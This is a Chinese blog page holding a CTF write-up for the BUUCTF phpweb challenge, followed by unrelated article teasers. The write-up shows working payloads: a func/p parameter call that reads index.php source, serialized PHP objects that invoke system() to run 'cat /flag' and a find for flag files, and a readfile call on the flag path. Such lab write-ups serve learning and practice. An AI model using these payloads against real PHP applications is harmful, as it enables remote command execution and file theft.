当前位置：首页 > news >正文

BUUCTF—[网鼎杯 2020 朱雀组]phpweb

news 2026/2/8 20:20:47

题解

打开题目是这样子的。

啥也不管抓个包看看，从它返回的信息判断出func后面的是要调用的函数，p后面的是要执行的内容。

那我们直接执行个系统命令看看，可以看到返回了hack，估计是做了过滤。

func=system&p=ls

直接读取源码看看咯，可以看到过滤了好多函数，反正我认识的可以进行命令执行的函数都给禁了。

func=file_get_contents&p=index.php

但是它没有禁用反序列化函数，那么我们只要实现构造出要执行的命令，然后序列化。再调用反序列化函数将其还原，且执行命令不就行了吗。从源代码不难看出传参的是这一部分代码，我们照葫芦画瓢，对其进行序列化。

class Test {var $p = "cat /flag";var $func = "system";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}

运行下面代码。

<?php
class Test {var $p = "cat /flag";var $func = "system";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}
$a = new Test();
echo serialize($a);
?>

得到序列化后的数据。

O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

执行成功，返回当前目录下面的文件。

直接查到flag在哪里，发现 /tmp/flagoefiu4r93这个文件比较可以，估计是这个啦。

O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag*'";s:4:"func";s:6:"system";}

直接查看这个文件，但是这里我是cat /tmp/flagoefiu4r93，不知道为啥不行，有知道的大佬可以指点一下。

O:4:"Test":2:{s:1:"p";s:23:"cat /tmp/flagoefiu4r93'";s:4:"func";s:6:"system";}

用这个readfile函数读取，这个是PHP自带的函数，成功读取。

func=readfile&p=/tmp/flagoefiu4r93

总结

主要涉及的知识是反序列的运用，要懂得构造出序列化的数据，还得想到用file_get_contents函数读取源码。

BUUCTF—[网鼎杯 2020 朱雀组]phpweb

题解打开题目是这样子的。啥也不管抓个包看看，从它返回的信息判断出func后面的是要调用的函数，p后面的是要执行的内容。那我们直接执行个系统命令看看，可以看到返回了hack，估计是做了过滤。 funcsystem&pls 直接读取源码…...

编程日记 2024/9/5 21:18:22

什么是CDN及其如何影响SEO？

有没有想过，为什么你的网站在谷歌搜索结果的后几页徘徊，即使你已经优化了每一个网页？ 有时候， 慢速的网站性能可能是罪魁祸首。如果这个问题引起了你的共鸣，那么你可能想要探索一下内容分发网络（Content…...

编程日记 2024/9/5 21:14:58

python实现粒子群算

博客目录引言什么是粒子群算法（PSO）？粒子群算法的应用场景为什么使用粒子群算法？ 粒子群算法的原理粒子群算法的基本概念粒子位置和速度的更新规则粒子群算法的流程粒子群算法的特点与优势粒子群算法的实现步骤初始化粒子群…...

编程日记 2024/9/5 21:12:52

【Unity案例】搭建射击系统与UI

上期将基础的移动系统搭建完毕后就可以开始搭建更加复杂的系统部分了前排提示，由于一开始仅思考如何完成操作相关功能，以至于到后面重构稍微有些困难，继续写下去恐成屎山，故在搭完射击和武器UI后不再继续泛化到敌人和敌人状态机…...

编程日记 2024/9/5 21:09:46

Python使用zdppy_mysql操作MySQL和MariaDB数据库快速入门教程

zdppy_mysql 使用python操作MySQL 项目开源地址：https://github.com/zhangdapeng520/zdppy_mysql 安装 pip install zdppy_mysql使用教程连接MySQL import zdppy_mysql from config import host, username, password, database, port# 连接数据库 db zdppy_…...

编程日记 2024/9/5 21:08:44

union 的正确食用方法

0.前情提要 （很久）之前上编译原理时，一次实验课需要补充完善一个用 c 写的词法分析器；而这个分析器在定义语法树结点时使用了 union 存储语言中不同表达式的类型标签或值本身。因为当时刚好学完了 cpp，拿着锤子看啥都…...

编程日记 2024/9/5 21:07:43

汇编语言在虚拟机中输出“Hello World!”

1.软件 Nasmide64.exe(李忠老师编写) Fixvhdw64.exe(李忠老师编写) VirtualBox虚拟机(免费开源) 2.过程 01.Fixvhdw64.exe输入以下代码: mov ax,0xb800 mov ds,ax mov byte [0x00],H mov byte [0x02],e mov byte [0x04],l mov byte [0x06],l mov byte [0x08],o mov byte…...

编程日记 2024/9/5 21:06:39

JVM类的加载和类的加载器

JVM类的加载和类的加载器一.类的加载过程类的加载指的是将类的.class文件中的二进制数据读入到内存中，将其放在运行时数据区的方法区内，然后在堆区创建一个java.lang.Class对象，用来封装类在方法区内的数据结构。类的加载的最终产品是位于…...

编程日记 2024/9/5 21:05:38

MLM：多模态大型语言模型的简介、微调方法、发展历史及其代表性模型、案例应用之详细攻略

MLM：多模态大型语言模型的简介、微调方法、发展历史及其代表性模型、案例应用之详细攻略目录相关文章 AI之MLM：《MM-LLMs: Recent Advances in MultiModal Large Language Models多模态大语言模型的最新进展》翻译与解读 MLM之CLIP：CLIP…...

编程日记 2024/9/5 21:03:35

Java健康养老智慧相伴养老护理小程序系统源码代办陪诊陪护更安心

健康养老，智慧相伴 —— 养老护理小程序，代办陪诊陪护更安心 🌈【开篇：智慧养老，新时代的温馨守护】🌈 在这个快节奏的时代，我们总希望能给予家人更多的关爱与陪伴，尤其是家中的长…...

编程日记 2024/9/5 21:01:34

Python | Leetcode Python题解之第390题消除游戏

题目： 题解： class Solution:def lastRemaining(self, n: int) -> int:a1 1k, cnt, step 0, n, 1while cnt > 1:if k % 2 0: # 正向a1 stepelse: # 反向if cnt % 2:a1 stepk 1cnt >> 1step << 1return a1...

编程日记 2024/9/5 21:00:33

Github 2024-09-01 开源项目月报 Top16

根据Github Trendings的统计，本月(2024-09-01统计)共有16个项目上榜。根据开发语言中项目的数量，汇总情况如下：开发语言项目数量Python项目9TypeScript项目5Dart项目2C项目1Jupyter Notebook项目1Rust项目1开发者职业成长指南创建周期：2670 天开发语言：TypeScript协议类…...

编程日记 2024/9/5 20:59:32

C++ 继承(二)

目录 1. 实现一个不能被继承的类 2. 友元与继承 3.继承与静态成员 4.多继承及其菱形继承问题 (1). 继承模型 (2). 虚继承 (2.1)虚继承解决数据冗余和二义性的原理 (3). 多继承中指针偏移问题 (4). IO库中的菱形虚拟继承 5. 继承和组合 1. 实现一个不能被继承的类方法1…...

编程日记 2024/9/5 20:58:31

第 2 章：AJAX 的使用

AJAX 的使用核心对象：XMLHttpRequest，AJAX 的所有操作都是通过该对象进行的。 1. 使用步骤创建 XMLHttpRequest 对象 var xhr new XMLHttpRequest(); 设置请求信息 xhr.open(method, url);//可以设置请求头，一般不设置 xhr.setReques…...

编程日记 2024/9/5 20:57:30

ROS——视觉抓取

纲要视觉抓取中的关键技术内参标定物体识别定位抓取姿态分析运动规划外参标定任意两个位姿之间的关系眼在外眼在内手眼标定流程 robot 部分标定效果视觉抓取例程 grasping_demo.cpp 获取两个坐标系之间变换关系:waitForTransform 、 LookupTransform 求相…...

编程日记 2024/9/5 20:55:27

EPLAN2022基础教程

EPLAN2022软件介绍 EPLAN是一款专业的电气设计和绘图软件，它可以帮助我创建和管理电气项目，生成各种报表和文档，与其他软件和系统进行交互，优化工程流程和质量。与传统的CAD绘图对比，EPLAN更适合绘制电气原理图。下…...

编程日记 2024/9/5 20:54:26

【JavaWeb】Servlet 详解（处理逻辑及常见方法）

文章目录 1. Tomcat1.1 常见的错误1.1.1 出现 4041.1.2 出现 4051.1.3 出现 500 1.2 HttpServlet1.2.1 Tomcat 的处理逻辑1.2.2 相关方法 1.3 HttpServletRequest1.3.1 常见方法1.3.2 jackson 处理逻辑 1.4 HttpServletResponse1.4.1 常见方法 1. Tomcat tomcat 是一个 HTTP 服…...

编程日记 2024/9/5 20:53:25

6 自研rgbd相机基于rk3566之深度计算库程序详解

自研rgbd相机基于rk3566之深度计算库详解 1 tof深度计算库框架读入深度图像参数配置tof模组标定参数读入及解析深度计算函数接口2 tof深度计算库程序详解深度计算程序头文件深度计算程序源文件1 tof深度计算库框架读入深度图像参数配置支持raw8/raw10/raw16 格式 /*******…...

编程日记 2024/9/5 20:52:24

分布式系统框架hadoop3入门

分布式系统框架hadoop3入门 (qq.com) Hadoop3作为分布式系统架构的重要基石，为大规模数据存储与处理提供了强大支持基本信息 hadoop：一个存储和处理大数据的分布式系统框架组成： HDFS（数据存储）、MapReduce&…...

编程日记 2024/9/5 20:51:23

使用 i3.LayoutCell() 方法绘制版图并输出为 GDS 文件

使用 i3.LayoutCell 方法绘制版图并输出为 GDS 文件引言正文引言在 IPKISS i3.SRef() 函数一文中我们介绍了如何使用 i3.SRef() 函数将 instance 对象添加到 i3.LayoutCell() 创建的 Cell 对象上。但是当我们使用 write_gdsii() 输出版图时代码就会报错。这里我们将介绍如何…...

编程日记 2024/9/5 20:50:22

深入浅出Asp.Net Core MVC应用开发系列-AspNetCore中的日志记录

ASP.NET Core 是一个跨平台的开源框架，用于在 Windows、macOS 或 Linux 上生成基于云的新式 Web 应用。 ASP.NET Core 中的日志记录 .NET 通过 ILogger API 支持高性能结构化日志记录，以帮助监视应用程序行为和诊断问题。可以通过配置不同的记录提供程…...

编程新知 2026/2/8 4:37:06

Android Wi-Fi 连接失败日志分析

1. Android wifi 关键日志总结 (1) Wi-Fi 断开 (CTRL-EVENT-DISCONNECTED reason3) 日志相关部分： 06-05 10:48:40.987 943 943 I wpa_supplicant: wlan0: CTRL-EVENT-DISCONNECTED bssid44:9b:c1:57:a8:90 reason3 locally_generated1解析： CTR…...

编程新知 2025/9/14 19:44:52

stm32G473的flash模式是单bank还是双bank？

今天突然有人stm32G473的flash模式是单bank还是双bank？由于时间太久，我真忘记了。搜搜发现，还真有人和我一样。见下面的链接：https://shequ.stmicroelectronics.cn/forum.php?modviewthread&tid644563 根据STM32G4系列参考手…...

编程新知 2026/2/5 0:36:44